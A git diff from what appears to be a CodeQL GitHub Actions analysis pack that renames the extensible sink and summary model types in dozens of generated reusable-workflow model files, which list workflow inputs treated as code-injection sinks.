b/ql/lib/ext/generated/reusable-workflows/microsoft_applicationinsights-java.model.yml index b3e26a1cf13..f96264fbf42 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_applicationinsights-java.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_applicationinsights-java.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["microsoft/applicationinsights-java/.github/workflows/reusable-scheduled-job-notification.yml", "*", "input.success", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_chat-copilot.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_chat-copilot.model.yml index 963b64673a9..6aaf6aa2783 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_chat-copilot.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_chat-copilot.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["microsoft/chat-copilot/.github/workflows/copilot-run-integration-tests.yml", "*", "input.BACKEND_HOST", "code-injection", "generated"] - ["microsoft/chat-copilot/.github/workflows/copilot-deploy-plugins.yml", "*", "input.DEPLOYMENT_NAME", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_msquic.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_msquic.model.yml index fcf55466a9e..d246f4ce644 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_msquic.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_msquic.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["microsoft/msquic/.github/workflows/build-reuse-winkernel.yml", "*", "input.arch", "code-injection", "generated"] - ["microsoft/msquic/.github/workflows/build-reuse-winkernel.yml", "*", "input.tls", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_oryx.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_oryx.model.yml index 979bd414141..a35a1a628e6 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_oryx.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_oryx.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["microsoft/oryx/.github/workflows/automationTemplate.yaml", "*", "input.platformName", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_pr-metrics.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_pr-metrics.model.yml index 55d810d29b5..ec22645570f 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_pr-metrics.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_pr-metrics.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["microsoft/pr-metrics/.github/workflows/release-phase-1-internal.yml", "*", "input.patch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_react-native-windows-samples.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_react-native-windows-samples.model.yml index 19350db868c..e0eccb26a54 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_react-native-windows-samples.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_react-native-windows-samples.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["microsoft/react-native-windows-samples/.github/workflows/template-upgradesample.yml", "*", "input.extraRunWindowsArgs", "code-injection", "generated"] - ["microsoft/react-native-windows-samples/.github/workflows/template-upgradesample.yml", "*", "input.platform", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_vscode-cpptools.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_vscode-cpptools.model.yml index 8d9af1a4e15..5f85bb1a91a 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_vscode-cpptools.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_vscode-cpptools.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["microsoft/vscode-cpptools/.github/workflows/job-compile-and-test.yml", "*", "input.yarn-args", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/moby_buildkit.model.yml b/ql/lib/ext/generated/reusable-workflows/moby_buildkit.model.yml index 47c09bf4f63..7f1af324260 100644 --- a/ql/lib/ext/generated/reusable-workflows/moby_buildkit.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/moby_buildkit.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["moby/buildkit/.github/workflows/.test.yml", "*", "input.env", "code-injection", "generated"] - ["moby/buildkit/.github/workflows/.test.yml", "*", "input.includes", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/moby_moby.model.yml b/ql/lib/ext/generated/reusable-workflows/moby_moby.model.yml index 4ff0273b47a..b06b390e718 100644 --- a/ql/lib/ext/generated/reusable-workflows/moby_moby.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/moby_moby.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["moby/moby/.github/workflows/.windows.yml", "*", "input.storage", "code-injection", "generated"] - ["moby/moby/.github/workflows/.windows.yml", "*", "input.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mosaicml_composer.model.yml b/ql/lib/ext/generated/reusable-workflows/mosaicml_composer.model.yml index ba53c900ce8..d5746b566cc 100644 --- a/ql/lib/ext/generated/reusable-workflows/mosaicml_composer.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mosaicml_composer.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mosaicml/composer/.github/workflows/docker-configure-build-push.yaml", "*", "input.context", "code-injection", "generated"] - ["mosaicml/composer/.github/workflows/docker-configure-build-push.yaml", "*", "input.tags", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/msys2_setup-msys2.model.yml b/ql/lib/ext/generated/reusable-workflows/msys2_setup-msys2.model.yml index e43a220a278..fbe9e286d2b 100644 --- a/ql/lib/ext/generated/reusable-workflows/msys2_setup-msys2.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/msys2_setup-msys2.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["msys2/setup-msys2/.github/workflows/PKGBUILD.yml", "*", "input.test", "code-injection", "generated"] - ["msys2/setup-msys2/.github/workflows/PKGBUILD.yml", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mudler_localai.model.yml b/ql/lib/ext/generated/reusable-workflows/mudler_localai.model.yml index dd20d310079..6ba2fc75375 100644 --- a/ql/lib/ext/generated/reusable-workflows/mudler_localai.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mudler_localai.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mudler/localai/.github/workflows/image_build.yml", "*", "input.latest-image-aio", "code-injection", "generated"] - ["mudler/localai/.github/workflows/image_build.yml", "*", "input.latest-image", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mustardchef_wsabuilds.model.yml b/ql/lib/ext/generated/reusable-workflows/mustardchef_wsabuilds.model.yml index 3b9777b3f3a..6d522b776dc 100644 --- a/ql/lib/ext/generated/reusable-workflows/mustardchef_wsabuilds.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mustardchef_wsabuilds.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mustardchef/wsabuilds/.github/workflows/buildarm64.yml", "*", "input.amazonflag", "code-injection", "generated"] - ["mustardchef/wsabuilds/.github/workflows/buildarm64.yml", "*", "input.magiskver", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/n8n-io_n8n.model.yml b/ql/lib/ext/generated/reusable-workflows/n8n-io_n8n.model.yml index 3561bd15c36..c210f350439 100644 --- a/ql/lib/ext/generated/reusable-workflows/n8n-io_n8n.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/n8n-io_n8n.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["n8n-io/n8n/.github/workflows/e2e-reusable.yml", "*", "input.pr_number", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/napari_napari.model.yml b/ql/lib/ext/generated/reusable-workflows/napari_napari.model.yml index 29da5a83b62..81eeb82033c 100644 --- a/ql/lib/ext/generated/reusable-workflows/napari_napari.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/napari_napari.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["napari/napari/.github/workflows/reusable_run_tox_test.yml", "*", "input.qt_backend", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/nasa_fprime.model.yml b/ql/lib/ext/generated/reusable-workflows/nasa_fprime.model.yml index 9b92197cf5d..6d81f2ff242 100644 --- a/ql/lib/ext/generated/reusable-workflows/nasa_fprime.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nasa_fprime.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nasa/fprime/.github/workflows/reusable-project-builder.yml", "*", "input.target_platform", "code-injection", "generated"] - ["nasa/fprime/.github/workflows/reusable-project-builder.yml", "*", "input.fprime_location", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/nautobot_nautobot.model.yml b/ql/lib/ext/generated/reusable-workflows/nautobot_nautobot.model.yml index cbed3964cff..b7ea7250825 100644 --- a/ql/lib/ext/generated/reusable-workflows/nautobot_nautobot.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nautobot_nautobot.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nautobot/nautobot/.github/workflows/plugin_upstream_testing_base.yml", "*", "input.invoke_context_name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/nektos_act.model.yml b/ql/lib/ext/generated/reusable-workflows/nektos_act.model.yml index 29b47c04336..972b6f15baa 100644 --- a/ql/lib/ext/generated/reusable-workflows/nektos_act.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nektos_act.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nektos/act/pkg/runner/testdata/workflow_call_inputs/workflow_call_inputs.yml", "*", "input.with_default", "code-injection", "generated"] - ["nektos/act/pkg/runner/testdata/workflow_call_inputs/workflow_call_inputs.yml", "*", "input.required", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/neondatabase_neon.model.yml b/ql/lib/ext/generated/reusable-workflows/neondatabase_neon.model.yml index 3b8a83bc8c6..07f0c5c0f69 100644 --- a/ql/lib/ext/generated/reusable-workflows/neondatabase_neon.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/neondatabase_neon.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["neondatabase/neon/.github/workflows/build-build-tools-image.yml", "*", "input.image-tag", "output.image-tag", "taint", "manual"] - ["neondatabase/neon/.github/workflows/build-build-tools-image.yml", "*", "input.image-tag", "output.image", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/neovim_neovim.model.yml b/ql/lib/ext/generated/reusable-workflows/neovim_neovim.model.yml index 3c406b3bc0e..6bbf33e7f89 100644 --- a/ql/lib/ext/generated/reusable-workflows/neovim_neovim.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/neovim_neovim.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["neovim/neovim/.github/workflows/test_windows.yml", "*", "input.build_flags", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/nethermindeth_nethermind.model.yml b/ql/lib/ext/generated/reusable-workflows/nethermindeth_nethermind.model.yml index 3a94887f8ff..165965dd568 100644 --- a/ql/lib/ext/generated/reusable-workflows/nethermindeth_nethermind.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nethermindeth_nethermind.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nethermindeth/nethermind/.github/workflows/run-a-single-node-from-branch.yml", "*", "input.custom_run_id", "code-injection", "generated"] - ["nethermindeth/nethermind/.github/workflows/run-a-single-node-from-branch.yml", "*", "input.non_validator_mode", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-dotnet-agent.model.yml b/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-dotnet-agent.model.yml index 5198d5f418a..3d1e182458e 100644 --- a/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-dotnet-agent.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-dotnet-agent.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["newrelic/newrelic-dotnet-agent/.github/workflows/publish_release_notes.yml", "*", "input.agent_version", "code-injection", "generated"] - ["newrelic/newrelic-dotnet-agent/.github/workflows/post_deploy_agent.yml", "*", "input.test_mode", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-java-agent.model.yml b/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-java-agent.model.yml index e3694a38973..689cc91871a 100644 --- a/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-java-agent.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-java-agent.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["newrelic/newrelic-java-agent/.github/workflows/X-Reusable-VerifyInstrumentation.yml", "*", "input.page", "code-injection", "generated"] - ["newrelic/newrelic-java-agent/.github/workflows/GHA-Unit-Tests.yaml", "*", "input.agent-ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/newrelic_node-newrelic.model.yml b/ql/lib/ext/generated/reusable-workflows/newrelic_node-newrelic.model.yml index f6f33154581..0481c04cb67 100644 --- a/ql/lib/ext/generated/reusable-workflows/newrelic_node-newrelic.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/newrelic_node-newrelic.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["newrelic/node-newrelic/.github/workflows/release-creation.yml", "*", "input.changelog_file", "code-injection", "generated"] - ["newrelic/node-newrelic/.github/workflows/release-creation.yml", "*", "input.workflows", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/nexus-mods_nexusmods.app.model.yml b/ql/lib/ext/generated/reusable-workflows/nexus-mods_nexusmods.app.model.yml index 34efc8414d8..8c0c944a393 100644 --- a/ql/lib/ext/generated/reusable-workflows/nexus-mods_nexusmods.app.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nexus-mods_nexusmods.app.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nexus-mods/nexusmods.app/.github/workflows/build-windows-pupnet.yaml", "*", "input.AppVersion", "code-injection", "generated"] - ["nexus-mods/nexusmods.app/.github/workflows/build-windows-pupnet.yaml", "*", "input.PupNetVersion", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/nginxinc_kubernetes-ingress.model.yml b/ql/lib/ext/generated/reusable-workflows/nginxinc_kubernetes-ingress.model.yml index 71866026ef9..8f4c4432408 100644 --- a/ql/lib/ext/generated/reusable-workflows/nginxinc_kubernetes-ingress.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nginxinc_kubernetes-ingress.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nginxinc/kubernetes-ingress/.github/workflows/retag-images.yml", "*", "input.target_tag", "code-injection", "generated"] - ["nginxinc/kubernetes-ingress/.github/workflows/retag-images.yml", "*", "input.source_tag", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/nocodb_nocodb.model.yml b/ql/lib/ext/generated/reusable-workflows/nocodb_nocodb.model.yml index 83d241d21c0..9406f7d299c 100644 --- a/ql/lib/ext/generated/reusable-workflows/nocodb_nocodb.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nocodb_nocodb.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nocodb/nocodb/.github/workflows/playwright-test-workflow.yml", "*", "input.shard", "code-injection", "generated"] - ["nocodb/nocodb/.github/workflows/playwright-test-workflow.yml", "*", "input.db", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/novuhq_novu.model.yml b/ql/lib/ext/generated/reusable-workflows/novuhq_novu.model.yml index 3021de12568..36838ef4ddb 100644 --- a/ql/lib/ext/generated/reusable-workflows/novuhq_novu.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/novuhq_novu.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["novuhq/novu/.github/workflows/reusable-workers-service-deploy.yml", "*", "input.docker_image", "code-injection", "generated"] - ["novuhq/novu/.github/workflows/reusable-workers-service-deploy.yml", "*", "input.terraform_workspace", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/npm_abbrev-js.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_abbrev-js.model.yml index d2cb1da1e9f..8b16601e6c2 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_abbrev-js.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_abbrev-js.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["npm/abbrev-js/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_cli.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_cli.model.yml index c551a135a14..e8db2ff568d 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_cli.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_cli.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["npm/cli/.github/workflows/node-integration.yml", "*", "input.npmVersion", "code-injection", "generated"] - ["npm/cli/.github/workflows/node-integration.yml", "*", "input.nodeVersion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_fs-minipass.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_fs-minipass.model.yml index f469f5de268..208e444adeb 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_fs-minipass.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_fs-minipass.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["npm/fs-minipass/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_hosted-git-info.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_hosted-git-info.model.yml index 7ec8dac3f7b..41edf0b0373 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_hosted-git-info.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_hosted-git-info.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["npm/hosted-git-info/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_ini.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_ini.model.yml index 4ce9252ce76..faca7973f1f 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_ini.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_ini.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["npm/ini/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_json-parse-even-better-errors.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_json-parse-even-better-errors.model.yml index abb5b43c327..76db6821c5e 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_json-parse-even-better-errors.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_json-parse-even-better-errors.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["npm/json-parse-even-better-errors/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_minify-registry-metadata.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_minify-registry-metadata.model.yml index 9e9da70e88e..383a88ed055 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_minify-registry-metadata.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_minify-registry-metadata.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["npm/minify-registry-metadata/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_mute-stream.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_mute-stream.model.yml index 8de3f4c1ca4..bcd3b09ed68 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_mute-stream.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_mute-stream.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["npm/mute-stream/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_node-semver.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_node-semver.model.yml index 5ec8c096934..53e16f8771a 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_node-semver.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_node-semver.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["npm/node-semver/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_node-which.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_node-which.model.yml index af9582282d0..4310e028de1 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_node-which.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_node-which.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["npm/node-which/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_nopt.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_nopt.model.yml index 61bbb9d5372..84d2f57a3fb 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_nopt.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_nopt.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["npm/nopt/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_normalize-package-data.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_normalize-package-data.model.yml index fdb440a742f..7debf6960ed 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_normalize-package-data.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_normalize-package-data.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["npm/normalize-package-data/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_write-file-atomic.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_write-file-atomic.model.yml index efd05d69abe..640180b870a 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_write-file-atomic.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_write-file-atomic.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["npm/write-file-atomic/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/onflow_cadence.model.yml b/ql/lib/ext/generated/reusable-workflows/onflow_cadence.model.yml index 9be191425ff..7ea3039b552 100644 --- a/ql/lib/ext/generated/reusable-workflows/onflow_cadence.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/onflow_cadence.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["onflow/cadence/.github/workflows/compatibility-check-template.yml", "*", "input.base-branch", "code-injection", "generated"] - ["onflow/cadence/.github/workflows/compatibility-check-template.yml", "*", "input.repo", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/open-goal_jak-project.model.yml b/ql/lib/ext/generated/reusable-workflows/open-goal_jak-project.model.yml index 65a14c7cfaa..ced66aee32f 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-goal_jak-project.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-goal_jak-project.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["open-goal/jak-project/.github/workflows/windows-build-msvc.yaml", "*", "input.cmakePreset", "code-injection", "generated"] - ["open-goal/jak-project/.github/workflows/windows-build-clang.yaml", "*", "input.cmakePreset", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-demo.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-demo.model.yml index 2c031ea9dc6..e63440d1fca 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-demo.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-demo.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-demo/.github/workflows/build-images.yml", "*", "input.push", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet-contrib.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet-contrib.model.yml index b90aacee9ca..f7021148c51 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet-contrib.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet-contrib.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-dotnet-contrib/.github/workflows/Component.Package.yml", "*", "input.project-name", "code-injection", "generated"] - ["open-telemetry/opentelemetry-dotnet-contrib/.github/workflows/Component.BuildTest.yml", "*", "input.project-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet.model.yml 